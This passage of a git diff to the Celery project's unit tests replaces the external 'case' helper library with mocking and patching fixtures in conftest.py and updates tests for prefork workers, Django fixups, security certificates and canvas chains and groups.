- assert _tls.current_app is app
- set_mp_process_title.assert_called_with(
- 'celeryd', hostname='awesome.worker.com',
- )
+ @staticmethod
+ def Loader(*args, **kwargs):
+ loader = Mock(*args, **kwargs)
+ loader.conf = {}
+ loader.override_backends = {}
+ return loader
- with patch('celery.app.trace.setup_worker_optimizations') as S:
- os.environ['FORKED_BY_MULTIPROCESSING'] = '1'
- try:
- process_initializer(app, 'luke.worker.com')
- S.assert_called_with(app, 'luke.worker.com')
- finally:
- os.environ.pop('FORKED_BY_MULTIPROCESSING', None)
+ @patch('celery.platforms.signals')
+ def test_process_initializer(self, _signals, set_mp_process_title, restore_logging):
+ from celery import signals
+ from celery._state import _tls
+ from celery.concurrency.prefork import (WORKER_SIGIGNORE,
+ WORKER_SIGRESET,
+ process_initializer)
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _signals.ignore.assert_any_call(*WORKER_SIGIGNORE)
+ _signals.reset.assert_any_call(*WORKER_SIGRESET)
+ assert app.loader.init_worker.call_count
+ on_worker_process_init.assert_called()
+ assert _tls.current_app is app
+ set_mp_process_title.assert_called_with(
+ 'celeryd', hostname='awesome.worker.com',
+ )
- os.environ['CELERY_LOG_FILE'] = 'worker%I.log'
- app.log.setup = Mock(name='log_setup')
+ with patch('celery.app.trace.setup_worker_optimizations') as S:
+ os.environ['FORKED_BY_MULTIPROCESSING'] = '1'
try:
process_initializer(app, 'luke.worker.com')
+ S.assert_called_with(app, 'luke.worker.com')
finally:
- os.environ.pop('CELERY_LOG_FILE', None)
+ os.environ.pop('FORKED_BY_MULTIPROCESSING', None)
+
+ os.environ['CELERY_LOG_FILE'] = 'worker%I.log'
+ app.log.setup = Mock(name='log_setup')
+ try:
+ process_initializer(app, 'luke.worker.com')
+ finally:
+ os.environ.pop('CELERY_LOG_FILE', None)
+
+ @patch('celery.platforms.set_pdeathsig')
+ def test_pdeath_sig(self, _set_pdeathsig, set_mp_process_title, restore_logging):
+ from celery import signals
+ on_worker_process_init = Mock()
+ signals.worker_process_init.connect(on_worker_process_init)
+ from celery.concurrency.prefork import process_initializer
+
+ with self.Celery(loader=self.Loader) as app:
+ app.conf = AttributeDict(DEFAULTS)
+ process_initializer(app, 'awesome.worker.com')
+ _set_pdeathsig.assert_called_once_with('SIGKILL')
class test_process_destructor:
diff --git a/t/unit/conftest.py b/t/unit/conftest.py
index d355fe31edd..458e9a2ebf0 100644
--- a/t/unit/conftest.py
+++ b/t/unit/conftest.py
@@ -1,13 +1,19 @@
+import builtins
+import inspect
+import io
import logging
import os
+import platform
import sys
import threading
+import types
import warnings
-from importlib import import_module
-from unittest.mock import Mock
+from contextlib import contextmanager
+from functools import wraps
+from importlib import import_module, reload
+from unittest.mock import MagicMock, Mock, patch
import pytest
-from case.utils import decorator
from kombu import Queue
from celery.backends.cache import CacheBackend, DummyClient
@@ -27,7 +33,7 @@
)
try:
- WindowsError = WindowsError # noqa
+ WindowsError = WindowsError
except NameError:
class WindowsError(Exception):
@@ -39,6 +45,24 @@ class WindowsError(Exception):
CASE_LOG_LEVEL_EFFECT = 'Test {0} modified the level of the root logger'
CASE_LOG_HANDLER_EFFECT = 'Test {0} modified handlers for the root logger'
+_SIO_write = io.StringIO.write
+_SIO_init = io.StringIO.__init__
+
+SENTINEL = object()
+
+
+def noop(*args, **kwargs):
+ pass
+
+
+class WhateverIO(io.StringIO):
+
+ def __init__(self, v=None, *a, **kw):
+ _SIO_init(self, v.decode() if isinstance(v, bytes) else v, *a, **kw)
+
+ def write(self, data):
+ _SIO_write(self, data.decode() if isinstance(data, bytes) else data)
+
@pytest.fixture(scope='session')
def celery_config():
@@ -88,7 +112,7 @@ def reset_cache_backend_state(celery_app):
backend._cache.clear()
-@decorator
+@contextmanager
def assert_signal_called(signal, **expected):
"""Context that verifes signal is called before exiting."""
handler = Mock()
@@ -113,7 +137,6 @@ def app(celery_app):
def AAA_disable_multiprocessing():
# pytest-cov breaks if a multiprocessing.Process is started,
# so disable them completely to make sure it doesn't happen.
- from unittest.mock import patch
stuff = [
'multiprocessing.Process',
'billiard.Process',
@@ -326,3 +349,447 @@ def import_all_modules(name=__name__, file=__file__,
'Ignored error importing module {}: {!r}'.format(
module, exc,
)))
+
+
+@pytest.fixture
+def sleepdeprived(request):
+ """Mock sleep method in patched module to do nothing.
+
+ Example:
+ >>> import time
+ >>> @pytest.mark.sleepdeprived_patched_module(time)
+ >>> def test_foo(self, sleepdeprived):
+ >>> pass
+ """
+ module = request.node.get_closest_marker(
+ "sleepdeprived_patched_module").args[0]
+ old_sleep, module.sleep = module.sleep, noop
+ try:
+ yield
+ finally:
+ module.sleep = old_sleep
+
+
+# Taken from
+# http://bitbucket.org/runeh/snippets/src/tip/missing_modules.py
+@pytest.fixture
+def mask_modules(request):
+ """Ban some modules from being importable inside the context
+ For example::
+ >>> @pytest.mark.masked_modules('gevent.monkey')
+ >>> def test_foo(self, mask_modules):
+ ... try:
+ ... import sys
+ ... except ImportError:
+ ... print('sys not found')
+ sys not found
+ """
+ realimport = builtins.__import__
+ modnames = request.node.get_closest_marker("masked_modules").args
+
+ def myimp(name, *args, **kwargs):
+ if name in modnames:
+ raise ImportError('No module named %s' % name)
+ else:
+ return realimport(name, *args, **kwargs)
+
+ builtins.__import__ = myimp
+ try:
+ yield
+ finally:
+ builtins.__import__ = realimport
+
+
+@pytest.fixture
+def environ(request):
+ """Mock environment variable value.
+ Example::
+ >>> @pytest.mark.patched_environ('DJANGO_SETTINGS_MODULE', 'proj.settings')
+ >>> def test_other_settings(self, environ):
+ ... ...
+ """
+ env_name, env_value = request.node.get_closest_marker("patched_environ").args
+ prev_val = os.environ.get(env_name, SENTINEL)
+ os.environ[env_name] = env_value
+ try:
+ yield
+ finally:
+ if prev_val is SENTINEL:
+ os.environ.pop(env_name, None)
+ else:
+ os.environ[env_name] = prev_val
+
+
+def replace_module_value(module, name, value=None):
+ """Mock module value, given a module, attribute name and value.
+
+ Example::
+
+ >>> replace_module_value(module, 'CONSTANT', 3.03)
+ """
+ has_prev = hasattr(module, name)
+ prev = getattr(module, name, None)
+ if value:
+ setattr(module, name, value)
+ else:
+ try:
+ delattr(module, name)
+ except AttributeError:
+ pass
+ try:
+ yield
+ finally:
+ if prev is not None:
+ setattr(module, name, prev)
+ if not has_prev:
+ try:
+ delattr(module, name)
+ except AttributeError:
+ pass
+
+
+@contextmanager
+def platform_pyimp(value=None):
+ """Mock :data:`platform.python_implementation`
+ Example::
+ >>> with platform_pyimp('PyPy'):
+ ... ...
+ """
+ yield from replace_module_value(platform, 'python_implementation', value)
+
+
+@contextmanager
+def sys_platform(value=None):
+ """Mock :data:`sys.platform`
+
+ Example::
+ >>> mock.sys_platform('darwin'):
+ ... ...
+ """
+ prev, sys.platform = sys.platform, value
+ try:
+ yield
+ finally:
+ sys.platform = prev
+
+
+@contextmanager
+def pypy_version(value=None):
+ """Mock :data:`sys.pypy_version_info`
+
+ Example::
+ >>> with pypy_version((3, 6, 1)):
+ ... ...
+ """
+ yield from replace_module_value(sys, 'pypy_version_info', value)
+
+
+def _restore_logging():
+ outs = sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__
+ root = logging.getLogger()
+ level = root.level
+ handlers = root.handlers
+
+ try:
+ yield
+ finally:
+ sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__ = outs
+ root.level = level
+ root.handlers[:] = handlers
+
+
+@contextmanager
+def restore_logging_context_manager():
+ """Restore root logger handlers after test returns.
+ Example::
+ >>> with restore_logging_context_manager():
+ ... setup_logging()
+ """
+ yield from _restore_logging()
+
+
+@pytest.fixture
+def restore_logging(request):
+ """Restore root logger handlers after test returns.
+ Example::
+ >>> def test_foo(self, restore_logging):
+ ... setup_logging()
+ """
+ yield from _restore_logging()
+
+
+@pytest.fixture
+def module(request):
+ """Mock one or modules such that every attribute is a :class:`Mock`."""
+ yield from _module(*request.node.get_closest_marker("patched_module").args)
+
+
+@contextmanager
+def module_context_manager(*names):
+ """Mock one or modules such that every attribute is a :class:`Mock`."""
+ yield from _module(*names)
+
+
+def _module(*names):
+ prev = {}
+
+ class MockModule(types.ModuleType):
+
+ def __getattr__(self, attr):
+ setattr(self, attr, Mock())
+ return types.ModuleType.__getattribute__(self, attr)
+
+ mods = []
+ for name in names:
+ try:
+ prev[name] = sys.modules[name]
+ except KeyError:
+ pass
+ mod = sys.modules[name] = MockModule(name)
+ mods.append(mod)
+ try:
+ yield mods
+ finally:
+ for name in names:
+ try:
+ sys.modules[name] = prev[name]
+ except KeyError:
+ try:
+ del(sys.modules[name])
+ except KeyError:
+ pass
+
+
+class _patching:
+
+ def __init__(self, monkeypatch, request):
+ self.monkeypatch = monkeypatch
+ self.request = request
+
+ def __getattr__(self, name):
+ return getattr(self.monkeypatch, name)
+
+ def __call__(self, path, value=SENTINEL, name=None,
+ new=MagicMock, **kwargs):
+ value = self._value_or_mock(value, new, name, path, **kwargs)
+ self.monkeypatch.setattr(path, value)
+ return value
+
+ def object(self, target, attribute, *args, **kwargs):
+ return _wrap_context(
+ patch.object(target, attribute, *args, **kwargs),
+ self.request)
+
+ def _value_or_mock(self, value, new, name, path, **kwargs):
+ if value is SENTINEL:
+ value = new(name=name or path.rpartition('.')[2])
+ for k, v in kwargs.items():
+ setattr(value, k, v)
+ return value
+
+ def setattr(self, target, name=SENTINEL, value=SENTINEL, **kwargs):
+ # alias to __call__ with the interface of pytest.monkeypatch.setattr
+ if value is SENTINEL:
+ value, name = name, None
+ return self(target, value, name=name)
+
+ def setitem(self, dic, name, value=SENTINEL, new=MagicMock, **kwargs):
+ # same as pytest.monkeypatch.setattr but default value is MagicMock
+ value = self._value_or_mock(value, new, name, dic, **kwargs)
+ self.monkeypatch.setitem(dic, name, value)
+ return value
+
+ def modules(self, *mods):
+ modules = []
+ for mod in mods:
+ mod = mod.split('.')
+ modules.extend(reversed([
+ '.'.join(mod[:-i] if i else mod) for i in range(len(mod))
+ ]))
+ modules = sorted(set(modules))
+ return _wrap_context(module_context_manager(*modules), self.request)
+
+
+def _wrap_context(context, request):
+ ret = context.__enter__()
+
+ def fin():
+ context.__exit__(*sys.exc_info())
+ request.addfinalizer(fin)
+ return ret
+
+
+@pytest.fixture()
+def patching(monkeypatch, request):
+ """Monkeypath.setattr shortcut.
+ Example:
+ .. code-block:: python
+ >>> def test_foo(patching):
+ >>> # execv value here will be mock.MagicMock by default.
+ >>> execv = patching('os.execv')
+ >>> patching('sys.platform', 'darwin') # set concrete value
+ >>> patching.setenv('DJANGO_SETTINGS_MODULE', 'x.settings')
+ >>> # val will be of type mock.MagicMock by default
+ >>> val = patching.setitem('path.to.dict', 'KEY')
+ """
+ return _patching(monkeypatch, request)
+
+
+@contextmanager
+def stdouts():
+ """Override `sys.stdout` and `sys.stderr` with `StringIO`
+ instances.
+ >>> with conftest.stdouts() as (stdout, stderr):
+ ... something()
+ ... self.assertIn('foo', stdout.getvalue())
+ """
+ prev_out, prev_err = sys.stdout, sys.stderr
+ prev_rout, prev_rerr = sys.__stdout__, sys.__stderr__
+ mystdout, mystderr = WhateverIO(), WhateverIO()
+ sys.stdout = sys.__stdout__ = mystdout
+ sys.stderr = sys.__stderr__ = mystderr
+
+ try:
+ yield mystdout, mystderr
+ finally:
+ sys.stdout = prev_out
+ sys.stderr = prev_err
+ sys.__stdout__ = prev_rout
+ sys.__stderr__ = prev_rerr
+
+
+@contextmanager
+def reset_modules(*modules):
+ """Remove modules from :data:`sys.modules` by name,
+ and reset back again when the test/context returns.
+ Example::
+ >>> with conftest.reset_modules('celery.result', 'celery.app.base'):
+ ... pass
+ """
+ prev = {
+ k: sys.modules.pop(k) for k in modules if k in sys.modules
+ }
+
+ try:
+ for k in modules:
+ reload(import_module(k))
+ yield
+ finally:
+ sys.modules.update(prev)
+
+
+def get_logger_handlers(logger):
+ return [
+ h for h in logger.handlers
+ if not isinstance(h, logging.NullHandler)
+ ]
+
+
+@contextmanager
+def wrap_logger(logger, loglevel=logging.ERROR):
+ """Wrap :class:`logging.Logger` with a StringIO() handler.
+ yields a StringIO handle.
+ Example::
+ >>> with conftest.wrap_logger(logger, loglevel=logging.DEBUG) as sio:
+ ... ...
+ ... sio.getvalue()
+ """
+ old_handlers = get_logger_handlers(logger)
+ sio = WhateverIO()
+ siohandler = logging.StreamHandler(sio)
+ logger.handlers = [siohandler]
+
+ try:
+ yield sio
+ finally:
+ logger.handlers = old_handlers
+
+
+@contextmanager
+def _mock_context(mock):
+ context = mock.return_value = Mock()
+ context.__enter__ = Mock()
+ context.__exit__ = Mock()
+
+ def on_exit(*x):
+ if x[0]:
+ raise x[0] from x[1]
+ context.__exit__.side_effect = on_exit
+ context.__enter__.return_value = context
+ try:
+ yield context
+ finally:
+ context.reset()
+
+
+@contextmanager
+def open(side_effect=None):
+ """Patch builtins.open so that it returns StringIO object.
+ :param side_effect: Additional side effect for when the open context
+ is entered.
+ Example::
+ >>> with mock.open(io.BytesIO) as open_fh:
+ ... something_opening_and_writing_bytes_to_a_file()
+ ... self.assertIn(b'foo', open_fh.getvalue())
+ """
+ with patch('builtins.open') as open_:
+ with _mock_context(open_) as context:
+ if side_effect is not None:
+ context.__enter__.side_effect = side_effect
+ val = context.__enter__.return_value = WhateverIO()
+ val.__exit__ = Mock()
+ yield val
+
+
+@contextmanager
+def module_exists(*modules):
+ """Patch one or more modules to ensure they exist.
+ A module name with multiple paths (e.g. gevent.monkey) will
+ ensure all parent modules are also patched (``gevent`` +
+ ``gevent.monkey``).
+ Example::
+ >>> with conftest.module_exists('gevent.monkey'):
+ ... gevent.monkey.patch_all = Mock(name='patch_all')
+ ... ...
+ """
+ gen = []
+ old_modules = []
+ for module in modules:
+ if isinstance(module, str):
+ module = types.ModuleType(module)
+ gen.append(module)
+ if module.__name__ in sys.modules:
+ old_modules.append(sys.modules[module.__name__])
+ sys.modules[module.__name__] = module
+ name = module.__name__
+ if '.' in name:
+ parent, _, attr = name.rpartition('.')
+ setattr(sys.modules[parent], attr, module)
+ try:
+ yield
+ finally:
+ for module in gen:
+ sys.modules.pop(module.__name__, None)
+ for module in old_modules:
+ sys.modules[module.__name__] = module
+
+
+def _bind(f, o):
+ @wraps(f)
+ def bound_meth(*fargs, **fkwargs):
+ return f(o, *fargs, **fkwargs)
+ return bound_meth
+
+
+class MockCallbacks:
+
+ def __new__(cls, *args, **kwargs):
+ r = Mock(name=cls.__name__)
+ cls.__init__(r, *args, **kwargs)
+ for key, value in vars(cls).items():
+ if key not in ('__dict__', '__weakref__', '__new__', '__init__'):
+ if inspect.ismethod(value) or inspect.isfunction(value):
+ r.__getattr__(key).side_effect = _bind(value, r)
+ else:
+ r.__setattr__(key, value)
+ return r
diff --git a/t/unit/contrib/test_migrate.py b/t/unit/contrib/test_migrate.py
index e36e2f32751..2e395057462 100644
--- a/t/unit/contrib/test_migrate.py
+++ b/t/unit/contrib/test_migrate.py
@@ -3,7 +3,6 @@
import pytest
from amqp import ChannelError
-from case import mock
from kombu import Connection, Exchange, Producer, Queue
from kombu.transport.virtual import QoS
from kombu.utils.encoding import ensure_bytes
@@ -14,6 +13,7 @@
migrate_tasks, move, move_by_idmap,
move_by_taskmap, move_task_by_id,
start_filter, task_id_eq, task_id_in)
+from t.unit import conftest
# hack to ignore error at shutdown
QoS.restore_at_shutdown = False
@@ -203,7 +203,7 @@ def test_maybe_queue():
def test_filter_status():
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
filter_status(State(), {'id': '1', 'task': 'add'}, Mock())
assert stdout.getvalue()
diff --git a/t/unit/contrib/test_sphinx.py b/t/unit/contrib/test_sphinx.py
index de0d04aa5af..a4d74e04465 100644
--- a/t/unit/contrib/test_sphinx.py
+++ b/t/unit/contrib/test_sphinx.py
@@ -21,7 +21,6 @@ def test_sphinx():
app = TestApp(srcdir=SRCDIR, confdir=SRCDIR)
app.build()
contents = open(os.path.join(app.outdir, 'contents.html'),
- mode='r',
encoding='utf-8').read()
assert 'This is a sample Task' in contents
assert 'This is a sample Shared Task' in contents
diff --git a/t/unit/events/test_snapshot.py b/t/unit/events/test_snapshot.py
index 95b56aca3b5..3dfb01846e9 100644
--- a/t/unit/events/test_snapshot.py
+++ b/t/unit/events/test_snapshot.py
@@ -1,7 +1,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.app.events import Events
from celery.events.snapshot import Polaroid, evcam
@@ -106,8 +105,7 @@ def setup(self):
self.app.events = self.MockEvents()
self.app.events.app = self.app
- @mock.restore_logging()
- def test_evcam(self):
+ def test_evcam(self, restore_logging):
evcam(Polaroid, timer=timer, app=self.app)
evcam(Polaroid, timer=timer, loglevel='CRITICAL', app=self.app)
self.MockReceiver.raise_keyboard_interrupt = True
diff --git a/t/unit/fixups/test_django.py b/t/unit/fixups/test_django.py
index e352b8a7b2f..44938b1a04f 100644
--- a/t/unit/fixups/test_django.py
+++ b/t/unit/fixups/test_django.py
@@ -2,10 +2,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.fixups.django import (DjangoFixup, DjangoWorkerFixup,
FixupWarning, _maybe_close_fd, fixup)
+from t.unit import conftest
class FixupCase:
@@ -54,6 +54,18 @@ def test_autodiscover_tasks(self, patching):
apps.get_app_configs.return_value = configs
assert f.autodiscover_tasks() == [c.name for c in configs]
+ @pytest.mark.masked_modules('django')
+ def test_fixup_no_django(self, patching, mask_modules):
+ with patch('celery.fixups.django.DjangoFixup') as Fixup:
+ patching.setenv('DJANGO_SETTINGS_MODULE', '')
+ fixup(self.app)
+ Fixup.assert_not_called()
+
+ patching.setenv('DJANGO_SETTINGS_MODULE', 'settings')
+ with pytest.warns(FixupWarning):
+ fixup(self.app)
+ Fixup.assert_not_called()
+
def test_fixup(self, patching):
with patch('celery.fixups.django.DjangoFixup') as Fixup:
patching.setenv('DJANGO_SETTINGS_MODULE', '')
@@ -61,11 +73,7 @@ def test_fixup(self, patching):
Fixup.assert_not_called()
patching.setenv('DJANGO_SETTINGS_MODULE', 'settings')
- with mock.mask_modules('django'):
- with pytest.warns(FixupWarning):
- fixup(self.app)
- Fixup.assert_not_called()
- with mock.module_exists('django'):
+ with conftest.module_exists('django'):
import django
django.VERSION = (1, 11, 1)
fixup(self.app)
@@ -257,17 +265,17 @@ def test_on_worker_ready(self):
f._settings.DEBUG = True
f.on_worker_ready()
- def test_validate_models(self, patching):
- with mock.module('django', 'django.db', 'django.core',
- 'django.core.cache', 'django.conf',
- 'django.db.utils'):
- f = self.Fixup(self.app)
- f.django_setup = Mock(name='django.setup')
- patching.modules('django.core.checks')
- from django.core.checks import run_checks
- f.validate_models()
- f.django_setup.assert_called_with()
- run_checks.assert_called_with()
+ @pytest.mark.patched_module('django', 'django.db', 'django.core',
+ 'django.core.cache', 'django.conf',
+ 'django.db.utils')
+ def test_validate_models(self, patching, module):
+ f = self.Fixup(self.app)
+ f.django_setup = Mock(name='django.setup')
+ patching.modules('django.core.checks')
+ from django.core.checks import run_checks
+ f.validate_models()
+ f.django_setup.assert_called_with()
+ run_checks.assert_called_with()
def test_django_setup(self, patching):
patching('celery.fixups.django.symbol_by_name')
diff --git a/t/unit/security/test_certificate.py b/t/unit/security/test_certificate.py
index a52980422e8..d9f525dad25 100644
--- a/t/unit/security/test_certificate.py
+++ b/t/unit/security/test_certificate.py
@@ -3,10 +3,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery.exceptions import SecurityError
from celery.security.certificate import Certificate, CertStore, FSCertStore
+from t.unit import conftest
from . import CERT1, CERT2, KEY1
from .case import SecurityCase
@@ -38,7 +38,7 @@ def test_has_expired_mock(self):
x = Certificate(CERT1)
x._cert = Mock(name='cert')
- time_after = datetime.datetime.now() + datetime.timedelta(days=-1)
+ time_after = datetime.datetime.utcnow() + datetime.timedelta(days=-1)
x._cert.not_valid_after = time_after
assert x.has_expired() is True
@@ -47,7 +47,7 @@ def test_has_not_expired_mock(self):
x = Certificate(CERT1)
x._cert = Mock(name='cert')
- time_after = datetime.datetime.now() + datetime.timedelta(days=1)
+ time_after = datetime.datetime.utcnow() + datetime.timedelta(days=1)
x._cert.not_valid_after = time_after
assert x.has_expired() is False
@@ -84,7 +84,7 @@ def test_init(self, Certificate, glob, isdir):
cert.has_expired.return_value = False
isdir.return_value = True
glob.return_value = ['foo.cert']
- with mock.open():
+ with conftest.open():
cert.get_id.return_value = 1
path = os.path.join('var', 'certs')
diff --git a/t/unit/security/test_security.py b/t/unit/security/test_security.py
index 31d682e37be..0b75ffc3619 100644
--- a/t/unit/security/test_security.py
+++ b/t/unit/security/test_security.py
@@ -19,13 +19,13 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from kombu.exceptions import SerializerNotInstalled
from kombu.serialization import disable_insecure_serializers, registry
from celery.exceptions import ImproperlyConfigured, SecurityError
from celery.security import disable_untrusted_serializers, setup_security
from celery.security.utils import reraise_errors
+from t.unit import conftest
from . import CERT1, KEY1
from .case import SecurityCase
@@ -120,7 +120,7 @@ def effect(*args):
self.app.conf.task_serializer = 'auth'
self.app.conf.accept_content = ['auth']
- with mock.open(side_effect=effect):
+ with conftest.open(side_effect=effect):
with patch('celery.security.registry') as registry:
store = Mock()
self.app.setup_security(['json'], key, cert, store)
diff --git a/t/unit/tasks/test_canvas.py b/t/unit/tasks/test_canvas.py
index 53f98615e8e..ca2d0384257 100644
--- a/t/unit/tasks/test_canvas.py
+++ b/t/unit/tasks/test_canvas.py
@@ -1,7 +1,8 @@
import json
-from unittest.mock import MagicMock, Mock
+from unittest.mock import ANY, MagicMock, Mock, call, patch, sentinel
import pytest
+import pytest_subtests # noqa: F401
from celery._state import _task_stack
from celery.canvas import (Signature, _chain, _maybe_group, chain, chord,
@@ -90,7 +91,7 @@ def test_reduce(self):
assert fun(*args) == x
def test_replace(self):
- x = Signature('TASK', ('A'), {})
+ x = Signature('TASK', ('A',), {})
assert x.replace(args=('B',)).args == ('B',)
assert x.replace(kwargs={'FOO': 'BAR'}).kwargs == {
'FOO': 'BAR',
@@ -154,6 +155,29 @@ def test_merge_immutable(self):
assert kwargs == {'foo': 1}
assert options == {'task_id': 3}
+ def test_merge_options__none(self):
+ sig = self.add.si()
+ _, _, new_options = sig._merge()
+ assert new_options is sig.options
+ _, _, new_options = sig._merge(options=None)
+ assert new_options is sig.options
+
+ @pytest.mark.parametrize("immutable_sig", (True, False))
+ def test_merge_options__group_id(self, immutable_sig):
+ # This is to avoid testing the behaviour in `test_set_immutable()`
+ if immutable_sig:
+ sig = self.add.si()
+ else:
+ sig = self.add.s()
+ # If the signature has no group ID, it can be set
+ assert not sig.options
+ _, _, new_options = sig._merge(options={"group_id": sentinel.gid})
+ assert new_options == {"group_id": sentinel.gid}
+ # But if one is already set, the new one is silently ignored
+ sig.set(group_id=sentinel.old_gid)
+ _, _, new_options = sig._merge(options={"group_id": sentinel.new_gid})
+ assert new_options == {"group_id": sentinel.old_gid}
+
def test_set_immutable(self):
x = self.add.s(2, 2)
assert not x.immutable
@@ -303,13 +327,9 @@ def test_from_dict_no_tasks(self):
def test_from_dict_full_subtasks(self):
c = chain(self.add.si(1, 2), self.add.si(3, 4), self.add.si(5, 6))
-
serialized = json.loads(json.dumps(c))
-
deserialized = chain.from_dict(serialized)
-
- for task in deserialized.tasks:
- assert isinstance(task, Signature)
+ assert all(isinstance(task, Signature) for task in deserialized.tasks)
@pytest.mark.usefixtures('depends_on_current_app')
def test_app_falls_back_to_default(self):
@@ -322,9 +342,8 @@ def test_handles_dicts(self):
)
c.freeze()
tasks, _ = c._frozen
- for task in tasks:
- assert isinstance(task, Signature)
- assert task.app is self.app
+ assert all(isinstance(task, Signature) for task in tasks)
+ assert all(task.app is self.app for task in tasks)
def test_groups_in_chain_to_chord(self):
g1 = group([self.add.s(2, 2), self.add.s(4, 4)])
@@ -535,6 +554,48 @@ def test_append_to_empty_chain(self):
assert x.apply().get() == 3
+ @pytest.mark.usefixtures('depends_on_current_app')
+ def test_chain_single_child_result(self):
+ child_sig = self.add.si(1, 1)
+ chain_sig = chain(child_sig)
+ assert chain_sig.tasks[0] is child_sig
+
+ with patch.object(
+ # We want to get back the result of actually applying the task
+ child_sig, "apply_async",
+ ) as mock_apply, patch.object(
+ # The child signature may be clone by `chain.prepare_steps()`
+ child_sig, "clone", return_value=child_sig,
+ ):
+ res = chain_sig()
+ # `_prepare_chain_from_options()` sets this `chain` kwarg with the
+ # subsequent tasks which would be run - nothing in this case
+ mock_apply.assert_called_once_with(chain=[])
+ assert res is mock_apply.return_value
+
+ @pytest.mark.usefixtures('depends_on_current_app')
+ def test_chain_single_child_group_result(self):
+ child_sig = self.add.si(1, 1)
+ # The group will `clone()` the child during instantiation so mock it
+ with patch.object(child_sig, "clone", return_value=child_sig):
+ group_sig = group(child_sig)
+ # Now we can construct the chain signature which is actually under test
+ chain_sig = chain(group_sig)
+ assert chain_sig.tasks[0].tasks[0] is child_sig
+
+ with patch.object(
+ # We want to get back the result of actually applying the task
+ child_sig, "apply_async",
+ ) as mock_apply, patch.object(
+ # The child signature may be clone by `chain.prepare_steps()`
+ child_sig, "clone", return_value=child_sig,
+ ):
+ res = chain_sig()
+ # `_prepare_chain_from_options()` sets this `chain` kwarg with the
+ # subsequent tasks which would be run - nothing in this case
+ mock_apply.assert_called_once_with(chain=[])
+ assert res is mock_apply.return_value
+
class test_group(CanvasCase):
@@ -593,15 +654,19 @@ def test_link(self):
g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app)
sig = Mock(name='sig')
g1.link(sig)
+ # Only the first child signature of a group will be given the callback
+ # and it is cloned and made immutable to avoid passing results to it,
+ # since that first task can't pass along its siblings' return values
g1.tasks[0].link.assert_called_with(sig.clone().set(immutable=True))
def test_link_error(self):
g1 = group(Mock(name='t1'), Mock(name='t2'), app=self.app)
sig = Mock(name='sig')
g1.link_error(sig)
- g1.tasks[0].link_error.assert_called_with(
- sig.clone().set(immutable=True),
- )
+ # We expect that all group children will be given the errback to ensure
+ # it gets called
+ for child_sig in g1.tasks:
+ child_sig.link_error.assert_called_with(sig)
def test_apply_empty(self):
x = group(app=self.app)
@@ -633,6 +698,30 @@ def test_from_dict(self):
x['args'] = None
assert group.from_dict(dict(x))
+ def test_from_dict_deep_deserialize(self):
+ original_group = group([self.add.s(1, 2)] * 42)
+ serialized_group = json.loads(json.dumps(original_group))
+ deserialized_group = group.from_dict(serialized_group)
+ assert all(
+ isinstance(child_task, Signature)
+ for child_task in deserialized_group.tasks
+ )
+
+ def test_from_dict_deeper_deserialize(self):
+ inner_group = group([self.add.s(1, 2)] * 42)
+ outer_group = group([inner_group] * 42)
+ serialized_group = json.loads(json.dumps(outer_group))
+ deserialized_group = group.from_dict(serialized_group)
+ assert all(
+ isinstance(child_task, Signature)
+ for child_task in deserialized_group.tasks
+ )
+ assert all(
+ isinstance(grandchild_task, Signature)
+ for child_task in deserialized_group.tasks
+ for grandchild_task in child_task.tasks
+ )
+
def test_call_empty_group(self):
x = group(app=self.app)
assert not len(x())
@@ -697,9 +786,212 @@ def test_kwargs_delay_partial(self):
res = self.helper_test_get_delay(x.delay(y=1))
assert res == [2, 2]
+ def test_apply_from_generator(self):
+ child_count = 42
+ child_sig = self.add.si(0, 0)
+ child_sigs_gen = (child_sig for _ in range(child_count))
+ group_sig = group(child_sigs_gen)
+ with patch("celery.canvas.Signature.apply_async") as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ assert mock_apply_async.call_count == child_count
+ assert len(res_obj.children) == child_count
+
+ # This needs the current app for some reason not worth digging into
+ @pytest.mark.usefixtures('depends_on_current_app')
+ def test_apply_from_generator_empty(self):
+ empty_gen = (False for _ in range(0))
+ group_sig = group(empty_gen)
+ with patch("celery.canvas.Signature.apply_async") as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ assert mock_apply_async.call_count == 0
+ assert len(res_obj.children) == 0
+
+ # In the following tests, getting the group ID is a pain so we just use
+ # `ANY` to wildcard it when we're checking on calls made to our mocks
+ def test_apply_contains_chord(self):
+ gchild_count = 42
+ gchild_sig = self.add.si(0, 0)
+ gchild_sigs = (gchild_sig, ) * gchild_count
+ child_chord = chord(gchild_sigs, gchild_sig)
+ group_sig = group((child_chord, ))
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == gchild_count
+ assert len(res_obj.children) == len(group_sig.tasks)
+ # We must have set the chord size for the group of tasks which makes up
+ # the header of the `child_chord`, just before we apply the last task.
+ mock_set_chord_size.assert_called_once_with(ANY, gchild_count)
+
+ def test_apply_contains_chords_containing_chain(self):
+ ggchild_count = 42
+ ggchild_sig = self.add.si(0, 0)
+ gchild_sig = chain((ggchild_sig, ) * ggchild_count)
+ child_count = 24
+ child_chord = chord((gchild_sig, ), ggchild_sig)
+ group_sig = group((child_chord, ) * child_count)
+ with patch.object(
+ self.app.backend, "set_chord_size",
+ ) as mock_set_chord_size, patch(
+ "celery.canvas.Signature.apply_async",
+ ) as mock_apply_async:
+ res_obj = group_sig.apply_async()
+ # We only see applies for the header grandchildren because the tasks
+ # are never actually run due to our mocking of `apply_async()`
+ assert mock_apply_async.call_count == child_count
+ assert len(res_obj.children) == child_count
+ # We must have set the chord sizes based on the number of tail tasks of
+ # the encapsulated chains - in this case 1 for each child chord
